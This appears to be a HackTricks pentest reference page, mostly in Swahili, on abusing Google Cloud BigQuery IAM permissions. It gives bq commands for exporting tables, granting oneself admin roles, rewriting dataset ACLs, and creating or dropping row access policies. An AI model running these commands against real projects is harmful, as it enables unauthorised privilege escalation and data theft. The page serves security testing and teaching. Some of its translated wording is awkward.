GCP - BigQuery Privesc

Support HackTricks

BigQuery

Kwa maelezo zaidi kuhusu BigQuery angalia:

Read Table

Kusoma taarifa zilizohifadhiwa ndani ya meza ya BigQuery inaweza kuwa inawezekana kupata taarifa nyeti. Ili kufikia taarifa hizo ruhusa inayohitajika ni bigquery.tables.get, bigquery.jobs.create na bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

Hii ni njia nyingine ya kufikia data. Ihamashe kwenye hifadhi ya wingu na pakua faili zenye taarifa. Ili kutekeleza hatua hii, ruhusa zifuatazo zinahitajika: bigquery.tables.export, bigquery.jobs.create na storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

Inaweza kuwa inawezekana kuingiza data fulani za kuaminika katika jedwali la Bigquery ili kutumia udhaifu mahali pengine. Hii inaweza kufanywa kwa urahisi na ruhusa bigquery.tables.get, bigquery.tables.updateData na bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

Mshambuliaji anaweza kutumia ruhusa hii kujipe ruhusa zaidi juu ya dataset ya BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

Ruhusa hii pekee inaruhusu kusaidia upya ufikiaji wako juu ya dataset ya BigQuery kwa kubadilisha ACLs zinazoonyesha nani anaweza kuipata:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

bigquery.tables.setIamPolicy

Mshambuliaji anaweza kutumia ruhusa hii kujipe ruhusa zaidi juu ya meza ya BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

Kulingana na nyaraka, kwa ruhusa zilizotajwa inawezekana kusaidia sera ya safu. Hata hivyo, ukitumia cli bq unahitaji zaidi: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Ni rahisi kupata kitambulisho cha chujio katika matokeo ya uainishaji wa sera za safu. Mfano:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Ikiwa una bigquery.rowAccessPolicies.delete badala ya bigquery.rowAccessPolicies.update unaweza pia kufuta sera hiyo:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Chaguo kingine kinachoweza kupita sera za ufikiaji wa safu ni kubadilisha tu thamani ya data iliyozuiliwa. Ikiwa unaweza kuona tu wakati term ni Cfba, badilisha rekodi zote za jedwali kuwa na term = "Cfba". Hata hivyo, hii inazuia na bigquery.

Support HackTricks

Last updated